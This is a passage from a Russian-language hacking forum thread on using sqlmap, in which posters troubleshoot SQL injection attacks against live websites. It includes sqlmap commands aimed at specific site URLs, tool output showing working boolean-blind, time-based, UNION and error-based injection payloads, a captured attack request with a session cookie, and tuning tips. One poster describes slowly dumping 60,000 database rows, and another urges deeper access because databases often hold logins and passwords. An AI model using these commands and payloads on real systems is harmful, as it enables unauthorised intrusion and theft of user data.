Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    по синтаксису это еррор-басед в mssql, но на деле скорее всего фолс от акунетикса
     
  2. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    22
    Reputations:
    2
    Что я делаю не так ???
    Code:
    D:\>python\python.exe D:\py\sqlmap\sqlmap.py -u http://site.ru/jewell
    ery.php?subcategory=8&parent_ID=8&sub=&open=339 --dbs
            ___
           __H__
    ___ ___[)]_____ ___ ___  {1.1.4.48#dev}
    |_ -| . [(]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
    consent is illegal. It is the end user's responsibility to obey all applicable
    local, state and federal laws. Developers assume no liability and are not respon
    sible for any misuse or damage caused by this program
    
    [*] starting at 02:20:02
    
    [02:20:02] [INFO] resuming back-end DBMS 'mysql'
    [02:20:02] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: subcategory (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: subcategory=8 AND 7118=7118
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: subcategory=8 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 8 columns
        Payload: subcategory=8 UNION ALL SELECT CONCAT(0x7162627171,0x7665706c754e46
    41694f424f67757945514458435369775648614c62644a56574b536753446d634f,0x7178716271)
    ,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Dnsi
    ---
    [02:20:08] [INFO] the back-end DBMS is MySQL
    web application technology: Apache, PHP 5.3.29
    back-end DBMS: MySQL >= 5.0.12
    [02:20:08] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlmap\
    output\site.ru'
    
    [*] shutting down at 02:20:08
    И почему у меня после выполнения команды вылазиет такое сообщение ?
    Code:
    "parent_ID" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    "sub" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    "open" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    
    D:\>
     
  3. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Code:
    "parent_ID" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    "sub" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    "open" не является внутренней или внешней
    командой, исполняемой программой или пакетным файлом.
    
    D:\>
    Это рофл чтоли? Потому что вы пытаетесь выполнить эти параметры, что вы там пишете в командной строке?
     
  4. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    22
    Reputations:
    2
    Code:
    --dbs
     
  5. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Именно sqlmap не может выдавать такие ошибки, это ошибки ос..
    Скиньте таргет в лс, мне даже интересно.
     
  6. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    в двойные кавычки урл засуньте, и ошибок никаких не будет
     
    Groove and l0mt1k like this.
  7. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    22
    Reputations:
    2
    Разобрался , всем спасибо!
     
  8. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Что означает эта ошибка при выполнении команды "update" через --sql-shell:
    [WARNING] execution of custom SQL queries is only available when stacked queries are supported
    ? и можно ли найти пути обхода ?
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Это говорит о том, что инъекция в SELECT запросе, где не возможно выполнить UPDATE.
    Условия при которых возможно использование Stacked Queries
    [​IMG]
     
    #389 cat1vo, 7 May 2017
    Last edited: 7 May 2017
  10. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Не понял, cms на php. На одном сайте проходит update, на другом нет. Как я понял завист от настройки на сервере? Но вопрос : может ли чтото измениться, если поиграться с параметрами, или это уже все?
     
  11. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    198
    Likes Received:
    8
    Reputations:
    1
    [08:44:51] [INFO] the back-end DBMS is MySQL
    web application technology: Apache 2, PHP 5.5.38
    back-end DBMS: MySQL >= 5.0
    [08:44:51] [INFO] fetching database names
    [08:44:51] [DEBUG] resuming configuration option 'code' (200)
    [08:44:51] [DEBUG] searching for error chunk length...
    [08:44:51] [PAYLOAD] 1 AND (SELECT 2283 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT REPEAT(0x34,1024)),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    [08:45:22] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
    [08:45:22] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
    [08:45:53] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request
    [08:46:23] [DEBUG] connection timed out to the target URL or proxy. sqlmap is going to retry the request
    [08:46:54] [CRITICAL] connection timed out to the target URL or proxy

    [*] shutting down at 08:46:54

    Не хочет мне бд показывать )) Уже и с прокси пробывал и тд.Что делать?
     
  12. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    198
    Likes Received:
    8
    Reputations:
    1
    Зависит от привилегий пользователя под которым ты сейчас.На первом сайте ты под админом на втором нет. --is-dba
     
  13. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    не соглашусь. --is-dba везде False. это влияет только на возможность работы с файловой системой. а вотредактирование записей в бд может быть может нет. возможно я как то не так запускаю тесты. хотлделал и с максимальными параметрами --level и --risk. все однно. одна и таже cms на разных хостингах . на одном редактирование проходят на других нет.
     
  14. MollizZz

    MollizZz New Member

    Joined:
    20 Feb 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Подскажи, как правильно ее вставлять в SQLMAP

    Например, выдало вот такое:
    Code:
    GET /video.php?id=-1'%20OR%203*2*1%3d6%20AND%20000432%3d000432%20--%20 HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://site.com/
    Cookie: PHPSESSID=4n4rsiu4gpbich32fllrl26gr6
    Host: site.com
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    Как правильно вставить ссылку?
     
    #394 MollizZz, 12 May 2017
    Last edited: 12 May 2017
  15. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    что то около того

    -u 'site.com/video.php?id=-1' --cookie="PHPSESSID=4n4rsiu4gpbich32fllrl26gr6" --random-agent -v 3
    если нужен вектор именно boolean то добавь ещё флаг --technique=B
     
    _________________________
  16. MollizZz

    MollizZz New Member

    Joined:
    20 Feb 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Пару часов назад спорил с одним товарищем по поводу техник
    Суть спора, что техники надо использовать только EU, так как то же самый --technique=B доступ к БД и колонкам откроет, но сливать колонки будет по 1 символу в 2-3 секунды
    Он рекомендует только --technique=EU
    Так ли это?
     
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    любая техника достаёт информацию из базы, вопрос только во времени
     
    _________________________
  18. MollizZz

    MollizZz New Member

    Joined:
    20 Feb 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Я лично вчера проводил эксперимент с одним сайтом
    Без каких либо техник уязвимость была вскрыта. Доступ к БД был открыт (правда начало сливать 1 символ в несколько секунд)
    С --technique=EU - не вскрыл
    Сайтец хороший, но те же самые 60к строк нужных колонок будет сливать месяц точно. Забросил в итоге
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    sqlmap не всегда сам нормально находит реализацию union вектору, лучше ему подсказывать
    --union-cols количество колонок
    --prefix --suffix начало и конец строки для инъекции
    может там waf был, зря забросил, нужно было попробовать раскрутить скуль руками
    "но те же самые 60к строк нужных колонок будет сливать месяц точно" стоило попробовать получить полноценный доступ к бд поискав другие лазейки, к тому же какой никакой доступ к базе есть, а там зачастую хранятся логины/пароли
     
    _________________________
  20. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    55
    Likes Received:
    5
    Reputations:
    0
    Кхм , можешь обьяснить на примере самой обычной скули ,как правильно юзать --prefix --suffix
     
Loading...